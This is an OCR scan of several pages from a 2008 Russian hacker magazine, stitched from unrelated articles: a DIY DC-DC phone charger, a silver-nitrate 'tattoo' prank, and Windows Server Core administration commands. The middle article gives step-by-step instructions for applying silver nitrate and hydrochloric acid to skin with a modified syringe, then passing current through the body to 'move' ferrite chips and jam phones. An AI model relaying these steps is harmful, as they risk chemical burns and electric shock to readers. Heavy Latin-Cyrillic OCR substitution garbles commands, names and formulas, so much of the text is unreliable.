Выглядитон, какчерная штукенция стремя ножками (существуют и другие 
виды корпусов, просто этот — самый распространенный). Если повернуть 
его ножками вниз и ксебе маркировкой, то средняя ножка — это общий 
провод, правая — выход, левая — вход. Перед входом и перед выходом 
надо поставить конденсатор, не менее одного микрофарада, а лучше боль- 
ше — микрофарад на сто, двести. На вход ему можно подавать вплоть до 
тридцати двух Вольт, а на выходе получишь четкие пять Вольт, пригодные 
для питания какого-нибудь контроллера. Воттолько на легкости приме- 
нения и дешевизне достоинства заканчиваются, дальше пойдет пере- 
числение недостатков. Во-первых, низкий КПД. Излишки напряжения 
он нагружает на себя же, превращая втепло. То есть, если утебя нагрузка 
кушает пол ампера тока, на выходе — пять Вольт, а на входе двенадцать, то 
потери мощности будут равны разнице между входным и выходным напря- 
жением, помноженным на потребляемыйток. Эта моща раскалит КРЕНку 
докрасна, разумеется, выведя ее из строя. Поэтому на них приходится 
ставить здоровенные радиаторы, рассеивающие излишнее тепло. Разу- 
меется, батарейку этот обогреватель будет жрать будь здоров, так что для 
мобильных решений он малопригоден. Разве что в качестве нагрузки будет 
что-либо совсем маломощное, например, микроконтроллер, кушающий 
какие-то считанные миллиамперы. Тогда потерями можно и пренебречь. 

Но — нежелательно. 

Н С КРЕНКОЙ Я НЕОТРАЗИМ, НО В МОЗГАХ СИДИТ ШИМ-ШИМ! 

Для преобразования постоянного тока без потерь используются 00-00 
преобразователи, работающие по принципу Широтно-Импульсной 
Модуляции (ШИМ, она же РѴѴМ). Еслиты вдругнечитал или запамятовал 
мои прошлые статьи, где я подробно разжевал тему ШИМ, то я кратко 
напомню. Суть втом, что тут напряжение подается не сплошным потоком, 
каквлинейных стабилизаторах, а краткими импульсами небольшой час- 
тотой. Например, на выходе ШИМ-контроллера, сначала в течение десяти 
микросекунд напряжение двенадцать Вольт, потом идет пауза — те же 
десять микросекунд, когда на выходе напряжения вообще нет. Затем все 
повторяется, словно мы быстро-быстро включаем и выключаем рубиль- 
ник. У нас получаются прямоугольные импульсы. Если вспомнить матан, а 
конкретно — интегрирование, после интегрирования этих импульсов мы 
получим площадь под фигурой очерченной импульсами. Таким образом, 
меняя ширину импульсов и пропуская их через интегратор, можно плавно 
менять напряжения от нуля до максимума с любым шагом и практически 
без потерь. 

В качестве интегратора выступает конденсатор, — он заряжается на пике, 
а на паузах будет отдавать энергию в цепь. Также всегда последователь- 
но ста вятдросс ель, кото р ы й тоже служитисточникомэнергии, тол ь ко о н 
запасает и отдаетток. Поэтомутакие преобразователи при небольших 
габаритах легко питают мощную нагрузку и почти не расходуютэнергию на 
лишний нагрев. Для простоты я переложил это в понятное«канализацион- 
ное русло». Смотри картинку, где ключевой транзистор ШИМ-контроллера 
похож на вентиль. Он открывает и закрывает канал. Конденсатор — это 
банка, накапливающая энергию. Дроссель — массивная турбина, которая, 



будучи разогнанной потоком при открытом вентиле, за счетсвоей инерции 
прогоняет воду потрубам и после закрытия вентиля. Конечно, самостоя- 
тельно разработать такой источник питания сложно, но не стоит напря- 
гаться поэтому поводу. Умные дядьки из Моіюгоіа, 5ТМ, Оаііави прочих 
РЫІірв’ов придумали всеза нас и выпустили уже готовые микросхемы, 
содержащие готовый ШИМ-контроллер. Тебе остается его припаять и до- 
бавить обвески, которая задает параметры работы, причем, в баіавЬееі’ах 
подробно расписано, что и как подключать, какие номиналы выбирать, а 
иногда даже дается готовый рисунок печатной платы. Надолишь немного 
знатьанглийский. 

Асейчас, в порядке практического задания, под моим чутким руководст- 
вом, ты построишьсебе универсальный зарядникдля сотового телефона, 
который можно будет подключать к любому источнику постоянного или 
переменного напряжения от8до40 Вольт. И неважно, что это будет — хоть 
бортовая сетьавтомобиля, связка батареекили какой-нибудь совершенно 
левый блокпитания отсвитча или модема, лишь бы не меньше восьми и 
не больше сорока Вольт. Страшно? Аты как думал. Я буду постепенно все 
выше и выше поднимать планочку, чтобытвои мозги кипели и скрипели, не 
успевая расслабляться. 

Н ПОЧУВСТВУЙ СЕБЯ СОЗДАТЕЛЕМ! 

Итак, потехзаданию, у нас на входе напряжение можетбыть как постоян- 
ным, так и переменным. А на входе ВС-ОС должно быть всегда постоян- 
ное. Что делать? Правильно, выпрямлять! Перечитай про выпрямители 
главой выше и воткни на входе схемы диодный мост. Можно и без него, но 
тогда источники переменного тока отпадают каккласс, да итебе придется 
каждый раз определять полярность питающего источника, а это — плохой 
тон. Поскольку после моста напряжение все равно будет пульсирующим, то 
повесь в параллель конденсатор. Он его немного сгладит. Дальше — ШИМ- 
контроллер; я рекомендую широко распространенный и любимый всеми 
электронщиками МС34063х, где на месте «х» можетбыть любая буква 
(часто — «А»). Тебе он нужен в й I Р-8 корпусе, с длинными выводами кото- 
рый. Надеюсь, ты уже выучил все популярныетипы корпусов и теперь сразу 
представляешь, какой выглядит? Затем открываем сдиска даташитину и 
смотрим схему понижающего преобразователя, зовется она Зіер-Ооѵѵп. 
Подключаем ее, какесть, не меняя ничего. Общий или земля у нас — это 
традиционно «минус», а «плюс» — Ѵіп. Выходом служит Ѵоиі в качестве 
плюса, а минусом служит все тот же общий провод. Тут важно не перепу- 
тать подключение к мобильнику, поэтому посмотри тестером полярность 
подачи напряжения на разъемтвоей мобилы. 

В ТОЧНЫЙ РАСЧЕТ! 

Схему мы набросали, осталось ее сконфигурировать. Это не цифровое 
устройство, а значит, конфигурация задается установкой необходимых 
номиналов резисторов. 

Резистор Рве я обычно заменяю перемычкой из куска провода. Его 
величина определяет перегрузочную способность. При перемычке 
преобразователь выдаст все, на что он способен, но можетегореть, если 
от него потребовать невозможное. Наличие резистора на 0.33 Ом заставит 
преобразовательзаглохнуть при предельной для него перегрузке. Чем 
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выше сопротивление Рве, тем при меньшей нагрузке заглохнет преобра- 
зователь. Это может быть полезно, когда тебе надо ограничить максималь- 
ный выходнойтоксо стороны источника. 

Дроссель І_1 выбирается только исходя из индуктивности и перегрузоч- 
ного тока. На схемеуказан дроссель индуктивностью 220 микроГенри, 
а току него должен быть не меньше 500-600 миллиампер (средний ток 
зарядки любого современного сотового). Дроссель можно купить готовый 
или — намотать самому. Величина индуктивности можеточень сильно 
варьироваться от 50 до 300 микроГенри (работать будет, но КПД, возможно, 
снизится). Главное, чтобы потоку проходил, иначе будетсильно греться, а 
потом и вовсе сгорит. 

Диод купи тотже, который и указан в схеме, благо, он не редкость. Если не 
найдешьточнотакой, то возьми любой диод Шоттки с расчетнымтоком 
не меньше одного ампера. Диод Шоттки отличается отобычного диким 
быстродействием. При смене направления напряжения он закрывается 
куда быстрее, чем обычный, не допуская даже малейшихутечектока в об- 
ратную сторону. Через него будет за мыкаться цепь «катушка — конденсатор 
— нагрузка», когда транзистор в микросхеме закроется. 

Теперь надо задать выходное напряжение. Для этого тебе надо взять 
тестер и померить, сколько Вольт выдаеттвой зарядник для сотового. У 
меня все зарядники выдают примерно по7 Вольт. Порывшись в даташите, 
находим формулу зависимости выходного напряжения от резисторов П1 и 
Р2. Для Зіер-Ооѵѵп схемы выглядитонатак: 

Ѵоиі=1.25(1+П1/П2). 

Чтобы получить напряжение в 7 Вольт, сопротивление П1 должно быть 
4.7 кОм, а Р2 должен быть равен 1 кОм. Получим 7.125 Вольта, ноэто не 
страшно, невелика погрешность и излишки все равно упадут где-нибудь 
на потерях в проводах. Собственно, все. Вот мы и разработали стобой уни- 



версальный преобразователь для девайсов. Осталось протравить плату 
и спаять (готовый рисунок платы, как и всю документацию, ты найдешь на 
диске). Но ни в коим случае НЕ СУЙ этот зарядник в РОЗЕТКУ: там напря- 
жение 220 Вольт, а наша схема рассчитана на 40 Вольт максимум! 

Кстати, покопайся в даташите, — найдешьтам и повышающую схему, зо- 
вется Біер-ІІр. Если выкинуть нафигдиодный мост (за ненужностью) и соб- 
рать всю конструкцию по схеме Біер-ІІр, тоты сможешь заряжать сотовый 
телефон оттрех, а то и двух пальчиковых батареек, если хватиттрех Вольт 
для раскачки микросхемы. Пусть это будет домашним заданием. 

г путь Фрика 

Данный ОС-ОС зарядник я разработал в качестве блока питания для 
ѲБМ-сигнализации на базе сотового (обычный сотовый зарядниксде- 
лан из низкопробного дешевого хлама, дающего жуткие помехи в рабо- 
те сигнализации, и, как следствие — ложные срабатывания). Один такой 
я таскаю в кармане в качестве дорожного зарядника. Надо было видеть 
лицо моего закадычного камрада, когда я со словами «Блин, батарея в 
телефоне сейчас сдохнет» принялся со злобным видом раскручивать 
его комповую колонку отверткой, чтобы добраться до трансформатора. 
Цель была самая невинная: от его девяти Вольт за питать свой мега 
девайс, дабы подкормить свой боевой Біетепз. Сказать, что чувак был в 
шоке — ничего не сказать. С тех пор он меня почитает как бога электро- 
ники, хотя я не сделал ничего выдающегося. 

Для интересующихся я создал тематический блог ЬирУ/еазѵеІесігопісз. 
ги . где буду постепенно выкладывать свои наработки, а также обучаю- 
щие статьи по электронике, схемотехнике, радиолюбительским хитрос- 
тям и программированию микроконтроллеров АѴП и М5С-51 . ѴѴеІсоте! 

И удачи в работе, коллега! ц-ц 
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іем можно успешно «вынести мозг» своему знакомому 
|ткнуться настырную со седку, вечно пристаю щую с оуонежом насчет велосипе- 
\а на лестничной площа дке? Правильно — убёд^ ^ь^ в 

порвать обоих на тряпки^о/^юи 



□ начале 90-х в связи с изменением общественной жизни 
появилось огромное количество всевозможных странных 
печатных листков, рассказывающих о крысах-переростках в 
метро или инопланетянах, насилующих дам бальзаковского 
возраста (или, наоборот, насилуемых? не помню...). На волне популярности 
оккультизма и всякой прочей забавной ерунды как-то подзабыли отаких 
вещах, как левитация и телекинез, хотя как раз эти-то гипотетические 
явления вполне могли бы существовать и, может быть, даже существуют. 

По крайней мере, в научной прессе проскакивали робкие заявления о 
квазителепортации. Однако, как известно по Геббельсу, чем больше врешь, 
тем больше верят! 

И пока Москву заполоняли крысы размером с ротвейлера, а старыхдев 
похищали гости с Альфа Центавры, над темой телекинеза отчаянно 
измывался даже беззубый Ералаш. Классика жанра: школьниклегко 
могдвигатьдневник«силой мысли»дотех пор, пока злобная училка не 
пригвождала его жирной увесистой двойкой по физике... за что предадим 
анафеме старую школьную мегеру и докажем, что не стоит припечатывать 
двойками явление, которое вполне реально (хотя бы теоретически). 

Начнем с простого факта, что любой проводникстоком создает магнитное 
поле. Проводником можетбыть что угодно — например, накоротко замкну- 
тый корпус электрического чайника, а затем итело человека, бьющегося 
в конвульсиях отудара 220 В. Если отбросить бытовой садизм, то человек 



и сам вырабатываетэлектрическиетоки; в частности, первые опыты по 
съему электроэнцефалограмм больше опирались на «отлов» именно маг- 
нитного поля. Естественно, биохимикам и медикам известны патологии, 
при которыхдаже просто нервные импульсы достигали такой мощности, 
что всплески их магнитного поля уверенно регистрировались лаборатор- 
ными приборами... 

Почему бы не помочь природе и неусилить возможности человека? 

В СКУЧНАЯ И ЗАНУДНАЯ ТЕОРИЯ 

Бесполезнозабивать голову школьными страшилками про расчет полей 
проводников разной формы. Тело человека и распределение импульсов в 
нем — не просто сложно. Это непредсказуемо. Если у нас есть примитив- 
ный произвольный проводникстоком и интересует магнитное поле, соз- 
даваемое куском этого проводника в данной точке, то придется попотеть. 
Как, кстати, в электростатике находится электрическое поле, создаваемое 
каким-то распределением заряда? Правильно. Распределение разбивают 
на малые элементы, вычисляют в каждой точке поле от каждого элемента и 
суммируют. Такая же программа расчета и здесь. Но структура магнитного 
поля сложнее, чем электростатическое, и оно не потенциально: замкнутое 
магнитное поле нельзя представить как градиентскалярной функции. 

У него другая структура, хотя суть суммирования та же. Это означает, что 
даже просто беспорядочно свернутый мягкий проводник может создавать 
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настолько чертовски сложную структуру поля, что с вычислением всех этих 
сІеІІа-ІатЬсІа в огромном таком интегралище справится только компьютер. 
Задача не математическая. А потому забьем на нее! 

Нормальный инженертихо сплюнет в сторону физика-теоретика и 
просто измерит магнитное поле в нужной точке. Также впредь будем 
поступать и мы. 

Н ВЕСЕЛЕНЬКАЯ ХИМИЯ 

Кое-кто из фотолюбителей еще помнит разудалые времена «фиксажей 
кислых» и проявителей всех мастей. А кое-кто не забыл и про осаждение 
серебра изхлорида (использовали в одних из первыхтехнологий прояв- 
ления черно-белой фотографии). Суть проста: хлорид серебра на свету 
довольно активно распадается — и в массе соли, нанесенной на бумажную 
основу в видетонкой пленки эмульсии, там, куда попадаетсвет, появляются 
крохотные кристаллики серебра. Суспензированное серебро — это такой 
мерзкий черный порошок. Если промыть втемноте каким-нибудь восстано- 
вителем все это хозяйство, то не засвеченные участки просто оставят после 
себя прозрачный слой эмульсии. В засвеченных участках пройдет реакция 
— крохотные кристаллики серебра сработают как«раздражители». Они 
быстро покроются новыми кристалликами восстановленного из хлорида 
серебра, и эмульсия начнетбыстро темнеть. Получаем черно-белую фото- 
графию аз із. 



Н ЗАЙМЕМСЯ ТАТУИРОВКОЙ! 

Ага, именнотату. Тоже своего рода наука, только связанная, скорее, с меди- 
циной. Мало просто взять большую иглу, истыкать жертву и посыпать рану 
тонером от принтера. Результат, конечно, будет впечатлять, но с большей 
вероятностью вызоветскорую помощь, чем эстетически-готическое удо- 
вольствие. Нам же требуется создать не просто татуировку, а произведение 
искусства. Дело втом, что тэту будет... серебряным! Какя уже объяснял, 
восстановить серебро из АдСІ— плевое дело, но все же, технология тут 
несколько иная. Хлорид серебра распадается на свету, да и найти его в 
чистом виде вряд ли удастся. А вот нитрат серебра вполне можно приобрес- 
ти у старьевщиков на радио-рынке — он часто используется для некоторых 
специфических видов пайки. Придется, конечно, озаботиться выводом 
ионов N03- (анионов азотной кислоты) из организма — в отличие от СІ вещь 
не самая безобидная. 

Когда-то нитрат серебра под именем «ляпис» или «адский камень» 
использовался (да и сейчас используется) в медицине в качестве 
прижигающего и дезинфицирующего средства. В чистом виде это — по- 
лупрозрачные кристаллы, слегка подернутые металлической серостью. 
Нитрат на свету тоже медленно разлагается, но это легко поправимо: 
достаточно растворить его в воде, чтобы отделить выделившуюся се- 
ребряную пыль от собственно нитрата. Так и поступим... 

Сразу предупрежу, что для опыта потребуется дистиллированная вода. 



ХАКЕР 08 /116/ 08 



► 113 




І,ля пущего эффекта я использовал шести- итрехпенсовики из серебряного легированного сплава. Видно, что крупные монеты не шелохнулись, но часть 
іелких активно «ударилась в бега»!Д 
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Имейте в виду. . . 

ЩЧерез две-три недели от рисунка не останется и следа. Кожа 
«обновится» и сойдет вместе с кусочками тату. 

2 Убедитесь при подборе мощности, что вы запускаете изначаль- 
но отключенный источник питания и затем медленно повышай- 
те мощность — человек в состоянии легкого волнения имеет 
более низкое сопротивление, чем спокойный. Даже подключение 
«Кроны» может хорошенько тряхнуть. 

ЩНе стоит слишком принюхиваться к соляной кислоте — это 
занятие для жертв химической атаки при Ипре. 

|ДГак просто серебро из кожи не вытянуть. В случае неудачи с 
прорисовкой проводника (например, случайно замкнете всю 
петлю у самых выходных контактов) придется ждать полного 
исчезновения рисунка. Поэтому — аккуратнее. 




Почему сдвинуласьтолько часть монет? Аэто старые монеты Георга V, 
которые делались из другого сплаваИ 



Настоящая, из аптеки. Растворяем в теплой воде столько нитрата, сколько 
удастся. Желательно воду сильно не греть, так как когда она начнет 
остывать, часть соли выпадетснова в виде кристаллов. Нам это ни к чему, 

— раствор затем нужно загнать в шприц с хорошей толстой иглой. Иглу, 
правда, стоит перед употреблением «апгрейдить». Заостренный конец 
иглы надо обработать надфилем так, чтобы получился срез, перпенди- 
кулярный оси иглы, и при этом достаточно гладкий, чтобы при среднем 
нажатии не царапал и не прокалывал кожу. Будем считать, чтотеперьу нас 
есть инструменттатуировщика. Затем нужно найти кисточку помягче и при- 
готовить раствор «проявителя» на основе 5-10% соляной кислоты и обыч- 
ной поваренной соли, то есть хлорида натрия. Бояться кислоты не нужно 

— в желудке человека и так плещется 1 2% НСІ (все мы немного Чужие)! 
Теперь нужно за пастись терпением — процесс трудоемкий. Сначала 
тщательно моем руки (до локтей). Затем кладем подопытную конечность 
ладонью вверх (при возможности закрепляем или просто прижимаем к 
поверхности стола). Затем перевернутым иглой вниз шприцем с неболь- 
шим усилием очень медленно начинаем рисовать! Рисунок не проявится, 
поэтому необходимо аккуратнее рассчитывать участокотрисовки. Длина 
будущего рисунка имеетогромноезначение, поэтому лучше попотеть 
над этой операцией. КакнарисуешьочередныеЗ-5 см «вслепую», убери 
шприц, дай полминутки впитаться раствору в кожу и просохнуть. Теперь 
мягкой кисточкой с«проявителем» нежно «красим» рисунок... минуты 
через две он начнет проявляться в виде черной полоски серебра! 
Волноваться, что вы испоганили свое всячески обожаемоетело, не стоит. 
Эпидермис обновляется каждыедве недели, такчто через полмесяца от 
рисунка ничего не останется. Можешь продолжать дальше — через 3-4 
часа покроешь всю внутреннюю поверхность руки отпальцев до локтя. 
Насколько художественно будет вы гл я деть та кая «татушка», зависит 
исключительно оттвоей криворукости. Поскольку серебро идеально про- 
водит электрический ток, фактически, мы создали настоящий нательный 
проводник! Просто выведи «дорожки из серебра» куда-нибудь с локтя, 
чтобы к ним можно было надежно фиксировать провода. 

Н ФОКУСЫ-ПОКУСЫ 

Можно, конечно, попугатьзнакомых древним фокусом: взять лампочку в 
руки и, касаясь ее контактов серебряным проводником, засветить перед 
изумленной публикой. Но это детские забавы, недостойные истинного 
гика. Нас интересует магнетизм! 

1-Убийца техники! Просто пуская через тату переменныйток невысокой 
мощности, через несколько минутты почувствуешь «нагрев кожи». Но 
прежде ты сможешьэффективно глушить радиоприемники и даже неко- 



торые модели сотовыхтелефонов «мановением руки» — весьма забавное 
и полезноеумение, тем более чтотатуировкулегко спрятать под рукавом 
рубашки... 

2. Телекинез! Как известно, в природе существуют вещества, которые под 
воздействием магнитного поля сами приобретают магнитные свойства 
— ферромагнетики. Не будем лезть в дебри петель гистерезиса. Достаточ- 
но отколоть отобычного ферритового стержня (например, распространен- 
ной марки 600НН), выполненного в круглом или прямоугольном сечении, 
небольшой кусочек. Хитрость втом, что этот осколок в обычныхусловиях не 
обладает сколько-нибудь заметным магнетизмом. Он не липнет к металлу, 
а внешне будет напоминать неискушенномузрителю простой камешек... 
да и радиолюбитель в случае неправильной формы осколка тоже вряд ли 
догадается о его происхождении. 

Опытным путем подберите терпимую величинутока в петле — иначе можно 
незаметно для себя схватить небольшой ожог (страшного в этом ничего 
нет, но полчасика заставит поскулить на злосчастную судьбу и на меня 
лично). Напряжение лучше не делать выше 3-5 Вольт — «классические» 
12уже могут быть опасны для организма. Пусть лучше часть тока рассеется 
в тепло, чем вы получите хороший удар, а руку сведет судорога. Это тоже 
неопасно, но психологически пугает намного сильнее ожога. 

Теперь берем жертву за шкирку. Сажаем ее напротив полированного 
стола. Кладем перед ней «камешек», незаметно врубаем источник 
питания и начинаем махать руками, как заправский колдун-цели- 
тель. Как я уже упоминал, отрисовать идеальную кривую серебряной 
петли никому не удастся. Так что фокус будет сильно зависеть от 
везения... С высокой вероятностью тебе повезете изготовленной 
серебряной петлей, и ты будешь гонять осколок по поверхности сто- 
ла, как в детстве многие гоняли мелкие металлические предметы по 
столу при помощи магнитика, спрятанного под ним. Наверняка, жер- 
тва заподозрит неладное и полезет под стол, пытаясь поймать вас 
на примитивном мухлеже! Наслаждайся — пришел частриумфа! Ты 
можешь безбоязненно проделывать этот фокус под самым присталь- 
ным наблюдением хоть сотни глаз — пока проводник спрятан под 
рукавом, никакого обмана и в помине нет. Хотя если твое художес- 
твенное образование достаточно высоко, чтобы сделать красивую 
тату из одной незамкнутой петли, то можно и вообще не скрывать 
ничего, кроме источника питания. 

Замечу, что при удаче магнитное поле может достигать та кой силы, чтохва- 
титего для движения кусочка металла размером с копеечную монету. Это 
полностью выключаетздравый смысл у зрителей и вводит их в священный 
ужас и транс. Дальшеуже можно врать напропалую. ..□с 
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Почти с момента своего появления ѴѴіпсіоѵѵз прочно связывают с графичес- 
ким интерфейсом. Окна — неотъемлемая часть рабочего окружения, ядра 
и имиджа этой ОС. Но с выходом ѴѴіп2к8 все изменилось. Теперь стало воз- 
можным установить и использовать сервер без графики. 



СЕРГЕЙ «СПІШЕРІ» ЯРЕМЧУК 

/ СШЫОЕП@ЦА.ГМ / 



А СМЫСЛ? 

Если на десктопах графический интерфейсупрощает работу пользовате- 
лям, делая систему более дружелюбной, что весьма радует новичков, то на 
серверах все обстоите точностью до наоборот. Администраторы ѴѴІпсіоѵѵб 
вынуждены были мириться с присутствием компонентов, которые на по- 
рядокзавышали системныетребования коборудованию, занимали место 
на системном диске, но при этом не приносили какой-либо существенной 
пользы. Наличие лишних приложений и служб на серверных ОС, выпол- 
няющих критическиезадачи, увеличивало количество потенциальных 
уязвимостей и упрощало задачу взломщику. Междутем, администратор 
ІІпіх мог самостоятельно выбрать все необходимые компоненты, получая в 



результате полностью оптимизированную под конкретные нужды систему. 
Появление в ѴѴІп2к8 режима ЗегѵегСоге все изменило. Теперь, если при 
установке сервера выбрать БегѵегСоге Іпзіаііайоп, мы получим систему 
без графического интерфейса и с минимальным набором компонентов. 
Такой сервер априори будет и меть большую защищенность по сравнению с 
полным вариантом. И для установки он потребует всего 1 Гб места на харде, 
плюс место для повседневной эксплуатации в выбранной роли. 

На сайте МісгозоЙ вариантЗегѵегСоге обозвали «с ограниченным функ- 
циональным назначением». Дело втом, что пока в этом режиме можно 
реализовать не все роли. И, взависимости от версии сервера, некоторые 
роли будут иметь лимитированное количество функций. На сегодняшний 
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день в Зегѵег Соге реализованотолько семь ролей: 

• Службы домена Асйѵе Оігесіогу (АО; 

• Службы Асйѵе Оігесіогу ЫдЫѵѵеідЫ; Оігесіогу Зегѵісез (Ай 
Ю5); 

• Сервер йНСР; 

• Сервер О N5 ; 

• Файловый сервер (Рііе Зегѵег); 

• Сервер печати ( Ргі пі Зегѵег); 

• Службы потокового мультимедиа (Мебіа Зегѵісез). 

В ограниченной функциональности доступна и роль веб-сервера 
— ѴѴеЬ Зегѵісез (1 15). Отсутствие А5Р.Ы ЕТ не позволит использовать 
динамический контент, носценарии на А5Р работать будут. Это 
единственный режим, реализованный вЗегѵегСоге для ѴѴІп2к8 
ѴѴеЬЗегѵег. В ІФпіит-ВавебЗувФппБ вариантЗегѵег Соге отсутству- 
ет вообще. Полный списокдоступных ролей, в зависимости от вер- 
сии ѴѴІп2к8, смотри в документе «СотрагеЗегѵегСогеІпзІаІІайоп 
Орйопз», который расположен по адресу ѵуѵуѵу.ппісгобоК.сопп/ 
ѵѵіпбоѵѵ55егѵег2008/еп/и5/сотраге-соге-іп5ІаиаІіоп.а5рх . 
Крометого, для Зегѵег Соге доступен и ряд компонентов 
(Ееаіигез) — Ыеіѵѵогк ЕоасІ Ваіапсіпд, ѴѴІпбоѵѵз Васкир, 
ѴѴІпбоѵѵз ВІЙоскег Огіѵе Епсгурііоп, ѴѴІЫ5 и некоторые другие. 
Список ролей в Зегѵег Соге уже вызывает споры. С одной сто- 
роны доносится мнение, что список не мешает и расширить, 
но находятся и сторонники оставить все, как есть. Мол, уве- 
личение доступных ролей может испортить неплохую задумку 
и еще более запутает ситуацию с настройками. 

Впрочем, несмотря на кажущиеся ограничения, в списке ро- 
лей охвачен основной функционал, ради которого чаще всего 
и уста н а вл и ва ют ѴѴІ п б оѵѵб 5е гѵе г. 

Установка в режиме Зегѵег Соге практически не отличается от 
обычной установки ѴѴІп2к8 и не требует никаких специальных 
действий. Учитывая, что размеры инсталлируемой системы 
меньше, весь процессзанимаетотсилы минут десять (ход уста- 
новки был подробно рассмотрен в ][ 05.2008). В самом первом 
окне при выборе клавиатурной раскладки следует о ста вить 
ЕІМ, так как после загрузки утебя ничего не будет, кроме строки 
терминала. Активировать систему можно как во время установки 
(в третьем окне мастера), так и уже в рабочей системе. Если не 
произвести активацию, то через 14дней большая часть функций 
будет недоступна. Для этого заменяем, если нужно, введенный 
при установке или автоматически полученный ключ: 

> зІшдг.ѵЬз -ірк ХХХХХ-ХХХХХ-ХХХХХ-ХХХХХ- 

ххххх 

И активируем сервер: 

> зІшдг.ѵЬз -аСо 

С некоторой задержкой появится окно с результатом. В случае 
успеха в самом низу должна появиться строка «РгобиФ 
Асііѵаіеб БиссеззМІу». Чтобы узнать все параметры зітдг . 
ѵЬз, используй ключ «/?». 

Перед установкой следует четко определиться с необходимы- 
ми ролями и компонентами. Обновить предыдущую версию 
до ЗегѵегСоге нельзя, систему необходимо устанавливать 
«вчистую». Нельзя и преобразовать систему до полного ва- 
рианта (или наоборот). Поэтому если в будущем понадобится 
некоторая функциональность, отсутствующая в ЗегѵегСоге, 
систему придется переустанавливать. 

ПЕРВОНАЧАЛЬНЫЕ НАСТРОЙКИ 

После установки нажимаем <СЫ+Аи+ОеІ> и видим только 
один значок«0ібег ІІзег». Первую регистрацию нужно выпол- 
нять под учетной записью «Абтіпізігаіог» с пустым паролем 




(на следующем шаге его предложатсменить). Так какзащита 
сервера зависит, в том числе, и от устойчивости пароля адми- 
на, простые пароли запрещены политиками. Пароль должен 
содержать буквы, цифры или специальные символы — иначе 
он не будет принят. 

Первоначальная конфигурация задается с помощью команд- 
ной строки; затем сервером можноуправлять удаленно, 
используя подключение ксерверутерминалов, консольуправ- 
ления ММС или другие инструменты. 

После регистрации ты увидишь строгую консоль без 
рюшечек-кружавчиков. Непривычно, — ноне этого ли мы 
добивались? Если одной консоли недостаточно, просто 
набери «зіагі» и получишь еще одну. Хотя несколько 
графических приложений в Зегѵег Соге все-таки имеются. 
Например, нажав «сСігі+ЗЬйі+Ебо или <СМ+Аи+ОеІ> -> 




> ѵѵагпіпд 

Преобразовать сис- 
тему, установленную 
в режиме Зегѵег Соге, 
до полного варианта 
нельзя (как и наобо- 
рот), — в таком случае 
ѴѴІп2к8 придется 
полностью переуста- 
навливать. 



Полезные команды 

В процессе эксплуатации сервера обычно приходится выполнять ряд админист- 
ративных задач. Приведу несколько полезных команд для повседневной работы. 
Например, запуск сервиса можно произвести, введя команду «зс зНагТ имя_серви- 
са» или «пеі; знагі: имя_сервиса». Для остановки используем вместо знагі: — зі:ор. 
Чтобы убить зависшее приложение, сначала при помощи «Шзкіізі:» следует узнать 
его РГО (уникальный идентификатор процесса), а затем ввести: 

> Сазккііі /РІБ <ргосезз ІБ> 

Отсутствие графического ЕѵеШ Ѵіеѵуег еще не означает невозможность конт- 
роля событий. Для этого используем утилиту «ѵѵеѵШНіІ». Просмотреть список 
доступных событий можно, введя «ѵуеѵшШ еі». А информацию о конкретном типе 
события смотрим, использовав ключ ‘де’: 

> меѵкикіі де Зесигіку /:Е:кехк 

Ключ ‘ ДцехИ’ позволяет отформатировать вывод в текстовом формате (а не в 
ХМЬ) . Очистить список событий АррИсагіоп можно такой командой: 

> хѵеѵкикіі сі Арріісакіоп 
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> Ипкз 

• Полный СПИСОК 
доступных ролей, 
в зависимости от 
версии ѴѴІп2к8, 
смотри в документе 
«Сотраге Зегѵег Соге 
Іпзіаііаііоп Орііопв» 
на сайте Місговок 
[ ѵѵѵѵѵѵ.т іеговой, сот ]. 




• РольЗігеатіпд 
Месііа Бегѵісез 

доступна для закачки 
по адресу — $иррогк 
тісгозоД.сопп/ 
кЬ/934518 . 




> \ПІО 

• Если при уста- 
новке сервера 
выбрать Зегѵег Соге 
Іпзіаііаііоп, то мы по- 
лучим систему без гра- 
фического интерфейса 
и с минимальным 
набором компонентов. 

• После установки 
сетевые интерфей- 
сы настраиваются 
автоматически при по- 
мощи ООН Р, а если та- 
кового сервера в Сети 
не обнаруживается, то 
машина произвольно 
инициализирует имя 

и ІР-адрес в диапазо- 
не 1 69.254.Х.Х. 

• Для установки 115 по- 
надобится ввести 923 
символа (информация 
с сайта МісгозоЙ). 



5іа гі Тазк Мападег, ты вызовешь привычный Диспетчер 
задач (Тазк Мападег) со всеми надлежащими ему функци- 
ями. Но в Зегѵег Соге от него есть еще одна польза. Если 
по ошибке будут за крыты все окна терминалов, то открыть 
новое можно, выбрав в Диспетчере задач Рііе Ыеѵѵ 
Тазк и в появившемся окне введя «стб.ехе». А набрав в 
консоли команду «поіераб», ты сможешь делать пометки 
в Блокноте. 

Драйвера большинства устройств уже включены в поставку 
ѴѴІп2к8. Если какое-то устройство не работает, то драйвер 
устанавливается при помощи команды рприкіі: 

> рприкіі -і — а кііе . іпк 
И позапросу перегружаемся. 

Список модулей и драйверов можно получить, введя команду 
«бгіѵегциегу» или «зс диегу куре= сігіѵег» (пробел перед 
бгіѵег обязателен). 

При загрузке мы уже установили парольадминистратора, но 
его периодически следует менять. Это можно сделать так: 

> пек изег асітіпізкгаког * 

Звездочка использована, чтобы вывод пароля не показывался 
на экране. Если через плечо никто не подглядывает, то можно 
ввести «пек изег асітіпізкгаког РѲзЗмОгсІ». Или просто 
нажать <СігІ+АІ1+0еІ> и выбрать в появившемся окне пункт 
«СЬапдеа раззѵѵогб». 

После установки сетевые интерфейсы настраиваются 
автоматически при помощи йСНР, а если такового сер- 
вера в Сети не обнаруживается, — машина произвольно 
инициализирует имя и ІР-адрес в диапазоне 1 69.254. 
х.х. Текущие настройки Сети можно просмотреть, введя 
«ірсопТід /аіі». 

Если в Сети используются статические ІР-адреса,то назна- 
чить адрес компьютеру можно при помощи пеізб. Эта утилита 
была доступна и в предыдущих версиях ѴѴІпбоѵѵз, нотеперь, в 
виду отсутствия графических альтернатив, ее полномочия, да 
и возможности шире. 

Сначала посмотрим, как в системе определились сетевые 
интерфейсы: 

> пекзЪ. іпкегкасе ірѵ4 зЪ.оѵ? іпкегкасез 

ІсЬс Мек МТБ Зкаке Бате 



1 50 4294967295 соппескесі ЬоорЬаск 

Рзеисіо-Іпкегкасе 1 



2 20 1500 соппескесі Ьосаі Агеа 

Соппескіоп 

В та бл и це н а с и нте р есует первый стол б и к I б х , кото р ы й у ка - 
зывает на номер сетевого адаптера. В моем случае это «2». 
Теперьзадаем адрес. Формат команды такой: 

пекзЪ. іпкегкасе ірѵ4 зек асМгезз пате=" ІсЬс" 
